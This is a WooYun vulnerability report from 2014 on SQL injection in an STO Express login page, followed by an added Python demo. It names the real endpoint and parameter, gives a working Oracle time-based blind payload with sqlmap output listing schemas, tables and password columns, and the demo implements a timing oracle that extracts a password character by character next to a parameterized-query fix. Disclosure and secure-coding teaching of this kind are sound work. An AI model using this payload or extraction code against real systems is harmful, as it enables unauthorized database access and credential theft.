Vulnerability summary

Defect ID: wooyun-2014-087673

Title: SQL injection in an STO Express (申通快递) system (DBA privileges)

Vendor: 申通快递 (STO Express)

Author: 路人甲

Submitted: 2014-12-18 14:32

Fix time: 2015-02-01 14:34

Published: 2015-02-01 14:34

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-12-18: Details sent to the vendor, awaiting vendor handling
2014-12-18: Vendor confirmed; details disclosed to the vendor only
2014-12-28: Details disclosed to core white hats and relevant domain experts
2015-01-07: Details disclosed to regular white hats
2015-01-17: Details disclosed to intern white hats
2015-02-01: Details disclosed to the public

Summary:

SQL injection in an STO Express system, DBA privileges

Details:

WooYun already has an earlier report related to this system:
WooYun: SQL injection in the login form of the STO Express operations platform and source code leak (申通快递运维平台登陆框注入及源码泄漏)
POST injection point:
http://bq.sto.cn/Login.aspx
Injectable parameter: txtUsername

[Screenshot: 1.jpg]


Proof:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: txtUsername (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTIxNTQ5Mzc5N2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGJ0bkxvZ2luOuRt537R02BUqhHXVkPpFql7P+4=&txtUsername=sKwn' AND 2938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(78)||CHR(109)||CHR(86),60) AND 'FOfy'='FOfy&btnLogin.x=1&btnLogin.y=1&txtPass=VZfZ
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Oracle
current user is DBA: True
available databases [19]:
[*] "CTXSYS\X11"
[*] "EXP\X11"
[*] "TSMS]S"
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] EXP_SYNC
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] STO
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] WMSYS
[*] XDB
The STO schema contains 11 tables:
Database: STO
[11 tables]
+------------------------------------------------------------------+
| MLOG$_TAB_营掖\\?CD\\?F8\\?B5\\?E3\\?B1\\?ED |
| TAB_\\?B0\\?CD歉\\?C0\\?E0\\?D0\\?CD\\?B1\\?ED |
| TAB_\\?B8\\?B6\\?BF\\?EE\\?B7\\?BD式\\?B1\\?ED |
| TAB_\\?B9\\?AB司员\\?B9\\?A4\\?B1\\?ED |
| TAB_\\?BF\\?EC\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD\\?B1\\?ED |
| TAB_\\?C1\\?F4\\?B2\\?D6\\?BC\\?FE原\\?D2\\?F2\\?B1\\?ED |
| TAB_\\?CE\\?CA\\?CC\\?E2\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD |
| TAB_\\?CE\\?EF品\\?C0\\?E0\\?B1\\?F0\\?B1\\?ED |
| TAB_\\?D6\\?D0转\\?B2\\?BF\\?B7\\?A2\\?BC\\?FE路\\?D3\\?C9\\?B1\\?ED |
| TAB_目\\?B5\\?C4\\?B5\\?D8\\?B1\\?ED |
| TAB_营掖\\?CD\\?F8\\?B5\\?E3\\?B1\\?ED |
+------------------------------------------------------------------+


Picking one table at random:

Table: TAB_\\?CE\\?CA\\?CC\\?E2\\?BC\\?FE\\?C0\\?E0\\?D0\\?CD
[19 columns]
+--------------------------+-------------+
| Column | Type |
+--------------------------+-------------+
| AUTHOR_NUM | non-numeric |
| AVA_PROFESSOR | non-numeric |
| C_DIARY_COMMENT_LOG_ID | non-numeric |
| CANANYONEDISCOVERJID | non-numeric |
| CARDNUMBER | non-numeric |
| CT_ID | non-numeric |
| DELAY | non-numeric |
| HISTORY_ID | non-numeric |
| ICONID | non-numeric |
| IDMEDICOFAMIGLIA | non-numeric |
| IDSTELLE | non-numeric |
| NODE_ID | non-numeric |
| P_ASSWORD | non-numeric |
| SECTION_VALUE | non-numeric |
| SESSION_MEMBER_LOGIN_KEY | non-numeric |
| SKLEP2 | non-numeric |
| TIDCLASFISCAIS | non-numeric |
| TRIGGERTEMPLATEID | non-numeric |
| VERSION_MIN | non-numeric |
+--------------------------+-------------+


I did not dump the other databases and tables...

Remediation:

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting
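Added example (not part of the original report and not STO Express's code): a Python/SQLite stand-in for the login query that shows why the sqlmap payload above works and what the fix looks like. In Oracle, DBMS_PIPE.RECEIVE_MESSAGE blocks for up to the given timeout (60 s in the payload) waiting on a pipe that never receives a message and returns 1 when it times out, so a login request that takes a minute longer proves the database evaluated the injected expression even though the response page never changes; the same delay, gated by a CASE expression, is the one-bit oracle sqlmap used to read the schema and table listings shown above. Assumptions: the `users` table, the `admin` row, `DELAY` and the two login functions are constructed for the demo; the payload is adapted in two ways (OR instead of AND because SQLite short-circuits a false left operand, and DBMS_PIPE.RECEIVE_MESSAGE renamed to DBMS_PIPE_RECEIVE_MESSAGE because SQLite function names cannot contain a dot).

```python
import sqlite3
import time

# Stand-in for the 60 s timeout in the report's payload; kept small so the demo runs fast.
DELAY = 0.05


def make_db():
    """Throw-away SQLite database standing in for the Oracle backend.

    Table, row and password are constructed sample data, not anything from the report.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'Qz7k')")

    # Oracle built-ins the payload relies on, re-created as SQLite functions.
    conn.create_function("CHR", 1, lambda n: chr(int(n)))
    conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else None)

    def dbms_pipe_receive_message(pipename, timeout):
        # Oracle blocks up to `timeout` seconds on an empty pipe and returns 1 on
        # timeout; the stand-in sleeps DELAY seconds instead of `timeout`.
        time.sleep(DELAY)
        return 1

    conn.create_function("DBMS_PIPE_RECEIVE_MESSAGE", 2, dbms_pipe_receive_message)
    return conn


def login_vulnerable(conn, username, password):
    """Login check built by string concatenation: the bug class in the report."""
    sql = ("SELECT COUNT(*) FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn, username, password):
    """Same check with bound parameters: user input never reaches the SQL parser.

    SQLite uses '?' placeholders; Oracle from ASP.NET uses :name binds with OracleParameter.
    """
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def timed(fn, *args):
    """Run fn(*args) and return (result, elapsed_seconds)."""
    t0 = time.perf_counter()
    result = fn(*args)
    return result, time.perf_counter() - t0


# The report's sqlmap payload, adapted as described in the lead-in.
TIME_PAYLOAD = ("sKwn' OR 2938=DBMS_PIPE_RECEIVE_MESSAGE("
                "CHR(82)||CHR(78)||CHR(109)||CHR(86),60) AND 'FOfy'='FOfy")


def detect(conn):
    """Return (delay with concatenation, delay with binding) for the same payload."""
    _, t_vuln = timed(login_vulnerable, conn, TIME_PAYLOAD, "VZfZ")
    _, t_fixed = timed(login_fixed, conn, TIME_PAYLOAD, "VZfZ")
    return t_vuln, t_fixed


def oracle(conn, condition):
    """True iff the SQL boolean `condition` holds on the server, judged by response time only."""
    payload = ("sKwn' OR (CASE WHEN " + condition
               + " THEN DBMS_PIPE_RECEIVE_MESSAGE('RNmV',5) ELSE 0 END)=1 AND 'a'='a")
    _, elapsed = timed(login_vulnerable, conn, payload, "x")
    return elapsed >= DELAY / 2


def extract(conn, subquery, length):
    """Recover `length` characters of a scalar subquery by binary search over printable ASCII."""
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, "ASCII(SUBSTR((" + subquery + ")," + str(pos) + ",1))>" + str(mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("delays (concatenated, bound):", detect(db))
    print("admin password recovered by timing alone:",
          extract(db, "SELECT password FROM users WHERE username='admin'", 4))
```

The concatenated query sleeps once per evaluated row, the bound query does not, and the login result is false in both cases, which is exactly why this class of bug is invisible to anyone watching only the page content. The fix shown in `login_fixed` is what the empty remediation section calls for: bind variables for every user-supplied value, and an application schema account without DBA, so that a future injection cannot enumerate SYS, SYSTEM and the other 18 schemas listed above.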


Vendor response

Vendor reply:

Severity: Medium

Rank: 10

Confirmed: 2014-12-18 17:26

Vendor comment:

Thanks

Latest status:

None yet